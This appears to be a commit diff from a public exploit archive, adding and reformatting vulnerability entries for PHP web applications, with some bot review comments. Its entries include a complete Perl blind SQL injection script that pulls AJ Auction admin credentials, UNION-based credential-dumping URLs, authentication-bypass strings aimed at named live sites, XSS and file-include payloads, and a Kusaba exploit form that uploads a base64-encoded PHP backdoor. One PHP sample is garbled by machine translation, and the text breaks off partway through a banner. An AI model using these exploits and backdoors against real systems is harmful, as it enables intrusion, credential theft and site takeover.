echo htmlspecialchars("E\xA1\xFF&", ENT_QUOTES, 'EUC-JP');
echo htmlspecialchars("F\x8E\xFF&", ENT_QUOTES, 'EUC-JP');
echo htmlspecialchars("G\x8F\xA1\xFF&", ENT_QUOTES, 'EUC-JP');
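Review bot: The seven `echo htmlspecialchars(...)` statements at the end of this file are not enclosed in `<?php ... ?>` and the advisory prose above them is not a comment, so `php 33414.php` prints the file verbatim instead of running the check; 33415.php in this commit has the same uncommented prose. Either keep the file as a `.txt` reference or open it with `<?php` and place the prose in a `/* ... */` block ahead of the first `// overlong UTF-8 sequence` comment. Each call also emits no separator, so the outputs run together; appending `. PHP_EOL` to every `echo` makes it possible to see per case whether a build returns the unescaped bytes or, as I understand fixed builds from 5.2.12 do for an invalid multibyte sequence, an empty string.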

23
platforms/php/remote/33415.php Executable file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/37389/info
PHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks.
Versions prior to PHP 5.2.12 are vulnerable.
<? php
$ _GET [ &#039; a1 &#039; ] = " \xf0 "; // \xf0 - \xfc ??? $ _GET [ &#039;A1&#039;] = "\ xf0"; / / \ xf0 - \ xfc possible
$ _GET [ &#039; a2 &#039; ] = " href=dummy onmouseover=alert(document.title) dummy=dummy "; $ _GET [ &#039;A2&#039;] = "href = dummy onmouseover = alert (document.title) dummy = dummy";
header ( " Content-Type:text/html; charset=Shift_JIS " ) ; header ( "Content-Type: text / html; charset = Shift_JIS");
?> ? "
< html > <Html>
< head >< title > Shift_JIS test </ title ></ head > <Head> <title> Shift_JIS test </ title> </ head>
< body > <Body>
< p >< a <P> <a title = " <?php echo htmlspecialchars ( $ _GET [ &#039; a1 &#039; ] , ENT_QUOTES, &#039; SJIS &#039; ) ?> " title = "<? php echo htmlspecialchars ($ _GET [ &#039;a1&#039;], ENT_QUOTES, &#039;SJIS&#039;)?>" href = " <?php echo htmlspecialchars ( $ _GET [ &#039; a2 &#039; ] , ENT_QUOTES, &#039; SJIS &#039; ) ?> " > test </ a ></ p > href = "<? php echo htmlspecialchars ($ _GET [ &#039;a2&#039;], ENT_QUOTES, &#039;SJIS&#039;)?>"> test </ a> </ p>
</ body > </ Body>
</ html > </ Html>
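Review bot: The snippet in this file is not parseable PHP as stored: the open tag is split into `<? php`, quotes are HTML-entity encoded as `&#039;`, tokens are space-separated (`$ _GET [ ... ]`), and every line carries a second, machine-translated copy of itself, so the test cannot be reproduced from the file. It should be reduced to plain PHP before publication, e.g. the first assignment becomes `$_GET['a1'] = "\xf0";` and the duplicated trailing text on each line is dropped. The `??? ` fragments on the `$_GET` and `?>` lines appear to be extraction residue rather than content and should go as well.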


@ -1,6 +1,6 @@
source: http://www.securityfocus.com/bid/9664/info
Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.
Reportedly the AllMyPHP application AllMyGuests is prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.
This issue may allow a remote attacker to execute arbitrary commands on the affected system with the privileges of the web server. Other attacks may be possible as well.

12
platforms/php/webapps/33401.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/37315/info
Million Pixel Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Million Pixel Script 3, 3 Pro, and 3 Pro Lotto are vulnerable; other versions may also be affected.
The following example URI is available:
http://www.example.com/?pa=[XSS]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37329/info
phpFaber CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following example is available:
http://www.example.com/module.php?mod=[XSS]

11
platforms/php/webapps/33406.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/37351/info
Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects versions prior to Horde 3.3.6.
Note that additional products that use the Horde framework may also be vulnerable.
http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=&lt;sessid&gt;

11
platforms/php/webapps/33407.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/37351/info
Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects versions prior to Horde 3.3.6.
Note that additional products that use the Horde framework may also be vulnerable.
http://www.example.com/horde-3.3.5/admin/cmdshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=&lt;sessid&gt;

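--- /dev/null
+++ b/platforms/php/webapps/33408.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37351/info
+Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+This issue affects versions prior to Horde 3.3.6.
+Note that additional products that use the Horde framework may also be vulnerable.
+http://www.example.com/horde-3.3.5/admin/sqlshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=&lt;sessid&gt;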
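--- /dev/null
+++ b/platforms/php/webapps/33409.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/37356/info
+Article Directory is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+The following example is available:
+Username : X' or ' 1=1
+Password : X' or ' 1=1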
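--- /dev/null
+++ b/platforms/php/webapps/33410.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/37371/info
+The Sections module for Drupal is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+To exploit this issue, the attacker must have 'administer sections' permissions.
+Versions prior to Sections 5.x-1.3 and 6.x-1.3 are vulnerable.
+The following example input is available:
+<script>alert('xss');</script>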

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37380/info
iDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
iSupport 1.8 and prior versions are vulnerable.
http://www.example.comhelpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37380/info
iDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
iSupport 1.8 and prior versions are vulnerable.
http://www.example.com/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37384/info
Pluxml-Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Pluxml-Blog 4.2 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/core/admin/auth.php?p=1">


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37393/info
QuiXplorer is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
QuiXplorer 2.4.1beta is vulnerable; other versions may also be affected.
http://www.example.com/path/?lang=../path/to/malicious_uploaded_code

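--- /dev/null
+++ b/platforms/php/webapps/33417.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/37394/info
+cPanel is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+cPanel versions prior to 11.25.0 are affected.
+http://www.example.com:2082/frontend/x3/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS
+http://www.example.com:2082/frontend/x3/files/dofileop.html?fileop=&opdir=&opfile=&dir=%2fhome%2fuser%2ftmp&fileop=HaCkED%20by%20RENO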

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37403/info
The 'com_joomportfolio' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_joomportfolio&Itemid=552&task=showcat&catid=1&secid=1/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password),user()/**/from/**/jos_users/**/


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37408/info
F3Site is prone to multiple local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
F3Site 2009 is vulnerable; other versions may also be affected.
http://www.example.com/mod/poll.php?GLOBALS[nlang]=[LFI%00]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37408/info
F3Site is prone to multiple local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
F3Site 2009 is vulnerable; other versions may also be affected.
http://www.example.com/mod/new.php?GLOBALS[nlang]=[LFI%00]


@ -1,84 +1,84 @@
#!/usr/bin/perl
#[Script Name: AJ Auction All Version (subcat.php) Remote BLIND SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
#[S.Page : http://www.ajsquare.com
#[Dork : "/subcat.php?cate_id="
#[$$ : 250.00 USD
#[.. : ajann,Turkey
use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[// AJ Auction All Version (subcat.php) Remote BLIND SQL Injection Exploit
[// Usage: exploit.pl [target]
[// Example: exploit.pl victim.com
[// Example: exploit.pl victim.com
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/subcat.php?cate_id=";
print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
$target = "-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list";
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /Categories Within turkey:(.*?)turkeypass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /turkeypass:(.*?)<\/b><\/font> <\/td><\/tr>/){
print "+ Password: $1\n";
}
if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
# milw0rm.com [2007-03-04]
#!/usr/bin/perl
#[Script Name: AJ Auction All Version (subcat.php) Remote BLIND SQL Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
#[S.Page : http://www.ajsquare.com
#[Dork : "/subcat.php?cate_id="
#[$$ : 250.00 USD
#[.. : ajann,Turkey
use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[// AJ Auction All Version (subcat.php) Remote BLIND SQL Injection Exploit
[// Usage: exploit.pl [target]
[// Example: exploit.pl victim.com
[// Example: exploit.pl victim.com
[// Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/subcat.php?cate_id=";
print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
$target = "-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list";
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /Categories Within turkey:(.*?)turkeypass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
if ($answer =~ /turkeypass:(.*?)<\/b><\/font> <\/td><\/tr>/){
print "+ Password: $1\n";
}
if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit();
}
}
# milw0rm.com [2007-03-04]


@ -1,49 +1,49 @@
--==+================================================================================+==--
--==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==--
--==+================================================================================+==--
Discovered By: t0pP8uZz
Discovered On: 12 MAY 2008
Script Download: http://www.ajsquare.com/products/auction/index.php?auc=1
DORK: inurl:"classifide_ad.php"
Vendor Has Not Been Notified!
DESCRIPTION:
AJ Auction (all versions to date) suffers from a insecure mysql query, allowing a remote attacker,
to arbitrary inject mysql code/query.
the below injection will display the admin credentials.
SQL Injection's:
http://site.com/classifide_ad.php?item_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,CONCAT(user_name,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*
NOTE/TIP:
admin login is at /admin/
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
peace, t0pP8uZz
--==+================================================================================+==--
--==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==--
--==+================================================================================+==--
# milw0rm.com [2008-05-12]
--==+================================================================================+==--
--==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==--
--==+================================================================================+==--
Discovered By: t0pP8uZz
Discovered On: 12 MAY 2008
Script Download: http://www.ajsquare.com/products/auction/index.php?auc=1
DORK: inurl:"classifide_ad.php"
Vendor Has Not Been Notified!
DESCRIPTION:
AJ Auction (all versions to date) suffers from a insecure mysql query, allowing a remote attacker,
to arbitrary inject mysql code/query.
the below injection will display the admin credentials.
SQL Injection's:
http://site.com/classifide_ad.php?item_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,CONCAT(user_name,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*
NOTE/TIP:
admin login is at /admin/
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
peace, t0pP8uZz
--==+================================================================================+==--
--==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==--
--==+================================================================================+==--
# milw0rm.com [2008-05-12]


@ -1,40 +1,40 @@
#########################################################
#
# Auction Web 2.0 SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# hussin.x[at]hotmail[DoT]com =
# =
#=========================================================
# HomE script : http://www.ajauctionpro.com/ajhome.php
#
# Demo : http://www.ajauctionpro.com/auction_web2.0/
#
# DorK : Powered By AJ Auction Web
# DorK : Powered By Auction Web
#
##########################################################
Exploit:
http://localhost.com/[PaTs]/category.php?cate_id=-1+union+select+1,concat(user_name,0x3a,password),3,4+from+admin--
Admin login
admin/index.php
################################################################################
#####################################( Greetz )#################################
# #
# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA #
# mos_chori / Rafi / FAHD / Iraq Hackers / #
# #
#################################(and All IRAQIs)###############################
################################################################################
# milw0rm.com [2008-06-19]
#########################################################
#
# Auction Web 2.0 SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# hussin.x[at]hotmail[DoT]com =
# =
#=========================================================
# HomE script : http://www.ajauctionpro.com/ajhome.php
#
# Demo : http://www.ajauctionpro.com/auction_web2.0/
#
# DorK : Powered By AJ Auction Web
# DorK : Powered By Auction Web
#
##########################################################
Exploit:
http://localhost.com/[PaTs]/category.php?cate_id=-1+union+select+1,concat(user_name,0x3a,password),3,4+from+admin--
Admin login
admin/index.php
################################################################################
#####################################( Greetz )#################################
# #
# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA #
# mos_chori / Rafi / FAHD / Iraq Hackers / #
# #
#################################(and All IRAQIs)###############################
################################################################################
# milw0rm.com [2008-06-19]


@ -1,14 +1,14 @@
############################################################################################
## AJ Auction Pro Platinum Skin #2 (detail.php item_id) Remote SQL Injection Vulnerability
## POC :
## /detail.php?item_id=-1+UNION+SELECT+1,2,3,4,concat(user_name,0x3a,password),
## 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
## ,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51+from+admin--
## Live Demo :
## http://www.ajauctionpro.com/ajauction_platinum2/detail.php?item_id=-1+UNION+SELECT+1,2,3,4
## ,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19
## ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42
## ,43,44,45,46,47,48,49,50,51+from+admin--
############################################################################################
# milw0rm.com [2008-09-24]
############################################################################################
## AJ Auction Pro Platinum Skin #2 (detail.php item_id) Remote SQL Injection Vulnerability
## POC :
## /detail.php?item_id=-1+UNION+SELECT+1,2,3,4,concat(user_name,0x3a,password),
## 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
## ,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51+from+admin--
## Live Demo :
## http://www.ajauctionpro.com/ajauction_platinum2/detail.php?item_id=-1+UNION+SELECT+1,2,3,4
## ,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19
## ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42
## ,43,44,45,46,47,48,49,50,51+from+admin--
############################################################################################
# milw0rm.com [2008-09-24]


@ -1,34 +1,34 @@
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Xss /Remote SQL injection
Script : Aj auction platinum2 , last version
Site : http://www.ajauctionpro.com
Dork : Powered By AJ Auction
Demo : http://www.ajauctionpro.com/ajauction_platinum2/
[ SQL injection ]
=========================================================================
EXP file: Script path /sellers_othersitem.php?seller_id=
SQL : -1%20union%20select%201,2,3,4,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin--
[Xss]
=========================================================================
EXP : search.php?min_cur=&product="''<?>>""''<script>alert(document.cookie)</script>
=========================================================================
ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
thanx str0ke/*
# milw0rm.com [2008-09-25]
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Xss /Remote SQL injection
Script : Aj auction platinum2 , last version
Site : http://www.ajauctionpro.com
Dork : Powered By AJ Auction
Demo : http://www.ajauctionpro.com/ajauction_platinum2/
[ SQL injection ]
=========================================================================
EXP file: Script path /sellers_othersitem.php?seller_id=
SQL : -1%20union%20select%201,2,3,4,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin--
[Xss]
=========================================================================
EXP : search.php?min_cur=&product="''<?>>""''<script>alert(document.cookie)</script>
=========================================================================
ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
thanx str0ke/*
# milw0rm.com [2008-09-25]


@ -1,28 +1,28 @@
<!--
9 Oct 2008
Kusaba <= 1.0.4 Remote Code Execution Exploit #2
Sausage <tehsausage@gmail.com>
Will work if they have left the load_receiver.php script un-edited.
After execution: (Yes these are the exact URLs)
http://www.kusaba.image.board/url/change this to the same value as your
KU_ROOTDIRpost.php?pc=print "Hello";
http://www.kusaba.image.board/url/change this to the same value as your
KU_ROOTDIRpost.php?sc=echo Hello
-->
<pre>
<form action="./load_receiver.php" method="POST">
<input type="text" name="password" value="changeme"> <!-- Don't actually
change this, unless they have changed their password and you know it -->
<input type="text" name="type" value="direct">
<input type="text" name="file"
value="PD9waHAgaXNzZXQoJF9HRVRbJ3BjJ10pPyhldmFsKHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3BjJ10pKSkpOihpc3NldCgkX0dFVFsnc2MnXSk/KHBhc3N0aHJ1KHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3NjJ10pKSkpOihoZWFkZXIoJ0xvY2F0aW9uOiAuLi8nKSkpOw==">
<!-- same backdoor from the paint_save.php exploit -->
<input type="text" name="targetname" value="post.php"> <!-- Any
inconspicuous filename will do -->
<input type="submit" value="Exploit">
</form>
# milw0rm.com [2008-10-09]
<!--
9 Oct 2008
Kusaba <= 1.0.4 Remote Code Execution Exploit #2
Sausage <tehsausage@gmail.com>
Will work if they have left the load_receiver.php script un-edited.
After execution: (Yes these are the exact URLs)
http://www.kusaba.image.board/url/change this to the same value as your
KU_ROOTDIRpost.php?pc=print "Hello";
http://www.kusaba.image.board/url/change this to the same value as your
KU_ROOTDIRpost.php?sc=echo Hello
-->
<pre>
<form action="./load_receiver.php" method="POST">
<input type="text" name="password" value="changeme"> <!-- Don't actually
change this, unless they have changed their password and you know it -->
<input type="text" name="type" value="direct">
<input type="text" name="file"
value="PD9waHAgaXNzZXQoJF9HRVRbJ3BjJ10pPyhldmFsKHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3BjJ10pKSkpOihpc3NldCgkX0dFVFsnc2MnXSk/KHBhc3N0aHJ1KHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3NjJ10pKSkpOihoZWFkZXIoJ0xvY2F0aW9uOiAuLi8nKSkpOw==">
<!-- same backdoor from the paint_save.php exploit -->
<input type="text" name="targetname" value="post.php"> <!-- Any
inconspicuous filename will do -->
<input type="submit" value="Exploit">
</form>
# milw0rm.com [2008-10-09]


@ -1,58 +1,58 @@
[~] deltascripts phpclassifieds Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 06.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] -----------------------------------------------------------
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://demo.deltascripts.com/classifieds/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
example 2:
admin login:
http://www.maramuresul-istoric.ro/anunturi/admin/login.php
admin: admin ' or ' 1=1
passwd: ZoRLu
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-11-06]
[~] deltascripts phpclassifieds Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 06.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] -----------------------------------------------------------
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://localhost/classifieds/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
example 2:
admin login:
http://localhost/anunturi/admin/login.php
admin: admin ' or ' 1=1
passwd: ZoRLu
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-11-06]


@ -1,4 +1,4 @@
[~] deltascripts phpclassifieds Remote Auth Bypass Vulnerability
[~] deltascripts phplinks Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
@ -25,7 +25,7 @@ note: generally admin name: admin
admin login for demo:
http://demo.deltascripts.com/classifieds/admin/login.php
http://localhost/classifieds/admin/login.php
example for demo:
@ -40,7 +40,7 @@ example 2:
admin login:
http://www.maramuresul-istoric.ro/anunturi/admin/login.php
http://localhost/anunturi/admin/login.php


@ -1,79 +1,79 @@
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
